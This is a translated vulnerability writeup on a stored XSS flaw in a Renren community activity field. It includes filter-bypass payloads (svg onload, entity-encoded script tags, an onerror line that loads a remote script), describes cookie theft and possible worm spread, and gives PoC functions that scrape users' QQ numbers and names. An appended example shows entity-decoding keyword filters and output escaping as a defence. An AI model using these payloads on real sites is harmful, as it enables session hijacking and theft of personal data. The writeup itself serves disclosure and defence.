A function of Renren community can cause worms (XSS filtering analysis and bypassing skills)

Source: Internet
Author: User

In short, at first only a front-end filter was in place, so after capturing and modifying the request a script of any length could be uploaded. That means cross-domain issues do not need to be considered when writing a worm here, although the & character gets eaten for no obvious reason. Today I noticed the vulnerability had been patched: it is no longer just front-end filtering, the backend now also performs keyword detection for <script> and some other keywords. svg is still not filtered and can pop up an alert, but for some reason a resource link placed after it would not load; in the end it was triggered successfully anyway. Let's take a look. I did not take many screenshots during the first test, so today I want to add a few more to complete the writeup. The browsers used are Firefox and Chrome.

Filtering of the activity introduction field is lax: the front-end filter can be bypassed by capturing and modifying the request, and the backend filtering is not strict either.

In the first test there was no backend filtering at all: you could simply modify the captured request to contain <script> xxxxx.

This is the situation today: keyword filtering has been added to the backend.

However, svg is not filtered. What I do not understand is why the request for the resource link placed after svg/onload always fails.

I switched to an out-of-band link and re-encoded the payload. While re-encoding it, I also found that if the script is written like this

onerror="JavaScriptCode like <scrip&#116>"

it is not filtered out, presumably because the filter only inspects the raw input and does not decode the HTML-entity-encoded data before matching.

A few svg test payloads are attached:

onerror="with(document)body.appendChild(createElement('script')).src='xxxxxxxxx'"

<svg xmlns="url"><g onload="javascript:alert(1)"></g></svg>

I used Firefox to publish the activity from one account and then visited it from a second account in Chrome. The cookie was obtained successfully, so the session can be hijacked.

Because community activities are published directly to the main Renren site, this could be used as a worm spreading among college students (lots of potential zombie hosts). A short PoC that obtains user information such as phone numbers and QQ numbers is attached here: access m.ren.com within the same domain and then call these functions.

function getQQ() {
    // The writeup's regex expects the QQ number to follow "<div>Q" in the <head> HTML.
    var quickExpr = /<div>Q([^<]*)/g;
    var headhtml = window.document.head.innerHTML;
    var qq = quickExpr.exec(headhtml);
    return qq ? qq[1] : null;   // avoid a TypeError when nothing matches
}

function getname() {
    // The name follows "- " in the <head> HTML; capture up to the next tag.
    // The original class "[^</tltle]" was a typo and would have stopped at any t, l or e.
    var quickExpr = /- ([^<]*)/g;
    var headhtml = window.document.head.innerHTML;
    var name = quickExpr.exec(headhtml);
    return name ? name[1] : null;
}

The name is matched; the goddess's name is mosaicked out in the screenshot.

The goddess's QQ is not for you.

In short, the test activity was deleted promptly and had no impact. Begging for rank. The cancelled activity is marked with the red circle.

Solution:

Filter keywords on the front end.
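As an added example (this is not code from the writeup, from Renren, or from any real filter), here is a keyword check of the kind the writeup describes, a plain substring match on the raw input, next to a hardened version that decodes HTML entities before matching. The decoder accepts numeric references without a trailing semicolon, because that is what the <scrip&#116> trick relies on, and the hardened check also rejects inline event handlers, svg and javascript: URLs. The sample inputs are constructed for the demo and the function names are assumptions.

```javascript
// Added example, not code from the writeup. Demonstrates why a backend keyword
// filter must decode HTML entities before matching. Sample inputs are constructed.

const NAMED_ENTITIES = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };

// Minimal entity decoder. Numeric references are decoded with or without the
// trailing ";" because browsers accept "&#116" (no semicolon) inside attributes.
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1] === 'x' || body[1] === 'X';
      const cp = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    const named = NAMED_ENTITIES[body.toLowerCase()];
    return named !== undefined ? named : match;
  });
}

// Decode repeatedly (bounded) so double-encoded input such as "&amp;#116;" is
// also normalised, then drop control characters some parsers ignore in tag names.
function normalize(s, maxRounds = 3) {
  let cur = s;
  for (let i = 0; i < maxRounds; i++) {
    const next = decodeEntities(cur);
    if (next === cur) break;
    cur = next;
  }
  return cur.replace(/[\x00-\x08\x0b\x0c\x0e-\x1f]/g, '');
}

// The kind of check the writeup describes: substring match on the raw input.
// It never sees "<script" in "<scrip&#116>" and ignores svg/onload entirely.
function naiveFilter(input) {
  return /<script/i.test(input);
}

// Hardened check: match on the normalised text and also reject inline event
// handlers, svg, iframes and javascript: URLs (the vectors used in the writeup).
const DANGEROUS_PATTERNS = [
  /<\s*script\b/i,
  /<\s*svg\b/i,
  /<\s*iframe\b/i,
  /\bon[a-z]+\s*=/i,
  /javascript\s*:/i,
];

function hardenedFilter(input) {
  const text = normalize(input);
  return DANGEROUS_PATTERNS.some((re) => re.test(text));
}

// Output encoding: the control that does not depend on a denylist at all.
// Render the field as text rather than markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed samples mirroring the payload shapes discussed in the writeup.
const SAMPLES = [
  '<script>alert(1)</script>',
  '<img src=x onerror="<scrip&#116>">',
  '<svg xmlns="url"><g onload="javascript:alert(1)"></g></svg>',
  '<p>Hello &amp; welcome</p>',
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const s of SAMPLES) {
    console.log(JSON.stringify(s), 'naive:', naiveFilter(s), 'hardened:', hardenedFilter(s));
  }
}
```

Run it with node and the table shows the naive check passing the entity-encoded and svg samples while the hardened check rejects them and still accepts the harmless "&amp;" paragraph. A denylist of this kind stays fragile no matter how many patterns it has; the robust fix is to escape the field on output (escapeHtml above) or to run it through an allowlist-based HTML sanitizer on the server, with the decoded-keyword check at most as an extra layer.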
